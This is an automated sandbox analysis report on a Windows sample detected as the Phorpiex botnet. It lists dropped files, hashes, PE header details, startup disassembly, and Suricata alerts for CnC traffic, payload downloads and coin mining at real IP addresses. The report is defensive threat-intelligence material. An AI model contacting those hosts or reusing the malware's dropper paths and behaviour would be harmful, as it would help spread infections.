                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\tbtnds.dat

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:OpenPGP Public Key
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4080
                                                                                                                                                                                                    Entropy (8bit):4.729847075237712
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:2ognIbioHgWZbe7N8vNhsC2NQ7u+UJs20v7yngHR6/Twg:2oDbiKLZbe7NkNhsD+UlGkC6/Td
                                                                                                                                                                                                    MD5:9984C582D3B8AEE760E19D9E4E52762D
                                                                                                                                                                                                    SHA1:2A779A6EA094F578E7CA8B35E4CD81E89ABB4F64
                                                                                                                                                                                                    SHA-256:18758A8DB2B76124F6BCBBB28CCBB070B9A9902E063DAEA756149301B9CDB296
                                                                                                                                                                                                    SHA-512:1963E5C4AE01692927A9A11BDEE99BE7ABDDA4BA1CB3C1D62C61104FEB04595B505835FF44521FE039F1E2DCD2536D4433C33F3B17EA3675D807D37D513D4F1F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.G.(......[o...._:.....N.G.....Z......%.}B.......o....M_./.....................c.g............U.s.....mJE+....^.D....._8L....._;.f...................[.>..................M.........-X.............E.....Z..............%.............Z...............W..V.....K!*....m.o...._9......Q_._......'(......Pi....V>.........R....^.........l\......0.....%..V....].V......?.......................C.....Z.......Z..B....)e.a.....R.......c......N'.y............Z..7......4.....u.....^..K....U.m.......%......2.......m.....^..........<..................].S.....\.V......x.u....Z..>....\...............................M%....%.q.....%..6......~'.....D.....Z..j....Z..{.....XQ......X......U.h......K_r......<e............#H......]5.......cw....\/.....m.7.....Z..........?....-.|q....[.\.....Z..H..............;.............6........I.............N'.........a.......I....Y.>^....R..K..............~.............X......|m0.......Mz....Z..=.....^LR....;[.z..........._9........-.......G.............

                                                                                                                                                                                                    C:\Windows\sysppvrdnvs.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5232.scr
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):85504
                                                                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):4.784841681226011
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                    File name:lJ4EzPSKMj.exe
                                                                                                                                                                                                    File size:79'872 bytes
                                                                                                                                                                                                    MD5:93ac88b5786cc524a9668ab13c73584f
                                                                                                                                                                                                    SHA1:d5e328f47208d69c7a47ec2713b1fcbbe51fb4fc
                                                                                                                                                                                                    SHA256:ada49c1b3b3d878fe42df213844d8d37ec59ac4f906060556ad901ba0d55b2a9
                                                                                                                                                                                                    SHA512:9e0268e3efc6387e6bcd1c6a31c1da19be62c25956bf6ac3ec1bfc89dc60146a0464a60857122c77f0576d89111082e02f964e78aa86f72b0d906e762498830b
                                                                                                                                                                                                    SSDEEP:192:H52jSxeumCYBy4nzLFTEJxTqthOVEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEI:H52mx3gk4n/lEuOH6666zD
                                                                                                                                                                                                    TLSH:2273D7A33E1FA436D45F7A3383D295AD0324C3C532F6D14416DAEFEB49129C2798A639
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........fW...9...9...9...B...9.......9...8...9.......9.......9.......9.......9.Rich..9.................PE..L....,.g...................

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:00928e8e8686b000

                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Entrypoint:0x4015ef
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                    Time Stamp:0x67122C05 [Fri Oct 18 09:36:05 2024 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:4cb3381251b5ea793cf2758c80a4b865

                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    call 00007FC4BCB06079h
                                                                                                                                                                                                    jmp 00007FC4BCB05A3Bh
                                                                                                                                                                                                    mov edi, edi
                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                    cmp dword ptr [eax], E06D7363h
                                                                                                                                                                                                    jne 00007FC4BCB05D2Ch
                                                                                                                                                                                                    cmp dword ptr [eax+10h], 03h
                                                                                                                                                                                                    jne 00007FC4BCB05D26h
                                                                                                                                                                                                    mov eax, dword ptr [eax+14h]
                                                                                                                                                                                                    cmp eax, 19930520h
                                                                                                                                                                                                    je 00007FC4BCB05D17h
                                                                                                                                                                                                    cmp eax, 19930521h
                                                                                                                                                                                                    je 00007FC4BCB05D10h
                                                                                                                                                                                                    cmp eax, 19930522h
                                                                                                                                                                                                    je 00007FC4BCB05D09h
                                                                                                                                                                                                    cmp eax, 01994000h
                                                                                                                                                                                                    jne 00007FC4BCB05D07h
                                                                                                                                                                                                    call 00007FC4BCB060CEh
                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                    retn 0004h
                                                                                                                                                                                                    push 004015F9h
                                                                                                                                                                                                    call dword ptr [0040201Ch]
                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    jmp dword ptr [004020ACh]
                                                                                                                                                                                                    push 00000014h
                                                                                                                                                                                                    push 004022A0h
                                                                                                                                                                                                    call 00007FC4BCB05F65h
                                                                                                                                                                                                    push dword ptr [00414AFCh]
                                                                                                                                                                                                    mov esi, dword ptr [00402068h]
                                                                                                                                                                                                    call esi
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                    cmp eax, FFFFFFFFh
                                                                                                                                                                                                    jne 00007FC4BCB05D0Eh
                                                                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                                                                    call dword ptr [00402064h]
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    jmp 00007FC4BCB05D69h
                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                    call 00007FC4BCB0608Fh
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                    push dword ptr [00414AFCh]
                                                                                                                                                                                                    call esi
                                                                                                                                                                                                    mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                    push dword ptr [00414AF8h]
                                                                                                                                                                                                    call esi
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    mov dword ptr [ebp-20h], eax
                                                                                                                                                                                                    lea eax, dword ptr [ebp-20h]
                                                                                                                                                                                                    push eax
                                                                                                                                                                                                    lea eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                                    push eax
                                                                                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                                                                                    mov esi, dword ptr [0040204Ch]
                                                                                                                                                                                                    call esi

                                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                    • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                    • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                    • [LNK] VS2008 SP1 build 30729

                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x22dc0x50.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x2b0.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000x174.reloc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x22180x40.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000xd0.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                    Sections

                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000xb440xc00265721981f561fad39237df44c639b14False0.6305338541666666data6.058495448632509IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rdata0x20000x74e0x80005c0db64feef6964125ca9c8fb8ede67False0.5009765625data4.858200766975316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .data0x30000x11b040x118002f47dad5d9bc37fdcc5b443a5eeac3d0False0.01025390625data4.298964899554775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                    .rsrc0x150000x2b00x4003314479941c845c8bc649cf38a5f4096False0.36328125data5.191469301324633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .reloc0x160000x26e0x4008d36f252ec34d577cbb12ddc0f0ce8ffFalse0.3740234375data3.040594048926162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                    Resources

                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                    RT_MANIFEST0x150580x256ASCII text, with CRLF line terminatorsEnglishUnited States0.5100334448160535

                                                                                                                                                                                                    Imports

                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    MSVCR90.dll__p__fmode, _encode_pointer, __set_app_type, ?terminate@@YAXXZ, _unlock, __p__commode, _lock, _onexit, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, _crt_debugger_hook, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, rand, mbstowcs, __dllonexit, strlen
                                                                                                                                                                                                    KERNEL32.dllUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, QueryPerformanceCounter, SetUnhandledExceptionFilter, GetStartupInfoA, InterlockedCompareExchange, InterlockedExchange, Sleep, LoadLibraryA, GetProcAddress, GetTickCount, FreeLibrary, IsDebuggerPresent
                                                                                                                                                                                                    USER32.dllwsprintfW

                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                    2024-10-26T07:26:21.520017+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.849705TCP
                                                                                                                                                                                                    2024-10-26T07:26:21.520017+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.854604TCP
                                                                                                                                                                                                    2024-10-26T07:26:21.520017+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.854399185.215.113.665152TCP
                                                                                                                                                                                                    2024-10-26T07:26:21.520017+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.854306TCP
                                                                                                                                                                                                    2024-10-26T07:26:21.520017+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.854494TCP
                                                                                                                                                                                                    2024-10-26T07:26:28.995994+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11185.215.113.6680192.168.2.849704TCP
                                                                                                                                                                                                    2024-10-26T07:26:29.306772+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21185.215.113.6680192.168.2.849704TCP
                                                                                                                                                                                                    2024-10-26T07:26:38.661961+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849705185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:38.661961+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.849705185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:40.632179+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289290.156.162.7240500UDP
                                                                                                                                                                                                    2024-10-26T07:26:40.654240+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849707185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:40.654240+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.849707185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:40.970136+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.849707TCP
                                                                                                                                                                                                    2024-10-26T07:26:45.664796+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289289.218.184.4240500UDP
                                                                                                                                                                                                    2024-10-26T07:26:46.377835+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849714185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:46.377835+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.849714185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:48.595033+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.858707185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:48.595033+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.858707185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:50.678122+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289246.100.182.16740500UDP
                                                                                                                                                                                                    2024-10-26T07:26:55.044885+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.858707185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:55.044885+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.858707185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:55.678177+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289294.230.236.6340500UDP
                                                                                                                                                                                                    2024-10-26T07:26:56.990263+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.858709185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:26:56.990263+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.858709185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:00.678302+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.862892117.236.188.17740500UDP
                                                                                                                                                                                                    2024-10-26T07:27:03.825632+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.858709185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:03.825632+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.858709185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:05.699436+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289292.46.228.24640500UDP
                                                                                                                                                                                                    2024-10-26T07:27:05.767442+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854297185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:05.767442+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854297185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:10.693866+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289294.230.235.14040500UDP
                                                                                                                                                                                                    2024-10-26T07:27:11.869662+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854299185.215.113.8480TCP
                                                                                                                                                                                                    2024-10-26T07:27:12.172288+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854297185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:12.172288+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854297185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:14.105430+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854300185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:14.105430+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854300185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:15.695331+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.862892198.163.192.1640500UDP
                                                                                                                                                                                                    2024-10-26T07:27:20.555835+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85430291.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:22.508145+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:22.508145+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:24.810131+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:24.810131+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:27.108194+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:27.108194+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:29.404932+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:29.404932+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:31.702449+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:31.702449+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85430391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:35.879739+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854306185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:35.879739+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854306185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:38.842455+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854325185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:38.842455+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854325185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:40.776669+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289295.58.91.7040500UDP
                                                                                                                                                                                                    2024-10-26T07:27:41.790574+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854341185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:41.790574+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854341185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:44.737359+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854356185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:44.737359+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854356185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:45.790840+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289290.156.160.8640500UDP
                                                                                                                                                                                                    2024-10-26T07:27:47.675542+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854376185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:47.675542+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854376185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:27:50.787679+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.862892187.133.73.540500UDP
                                                                                                                                                                                                    2024-10-26T07:27:51.645899+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85439391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:51.645899+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85439391.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:54.578349+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85441491.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:54.578349+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85441491.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:55.828945+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289295.56.76.1040500UDP
                                                                                                                                                                                                    2024-10-26T07:27:57.578878+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85443191.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:27:57.578878+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85443191.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:00.635363+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85444891.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:00.635363+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85444891.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:00.840057+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.8628925.232.31.24240500UDP
                                                                                                                                                                                                    2024-10-26T07:28:04.987175+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85446491.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:04.987175+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85446491.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:09.167543+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854494185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:09.167543+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854494185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:10.868047+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.8628925.133.123.15940500UDP
                                                                                                                                                                                                    2024-10-26T07:28:12.147710+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854513185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:12.147710+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854513185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:15.884666+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.86289292.46.174.25440500UDP
                                                                                                                                                                                                    2024-10-26T07:28:16.100049+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854530185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:16.100049+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854530185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:19.587861+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854551185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:19.587861+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854551185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:20.890779+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.8628925.202.213.16740500UDP
                                                                                                                                                                                                    2024-10-26T07:28:22.823567+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854568185.215.113.6680TCP
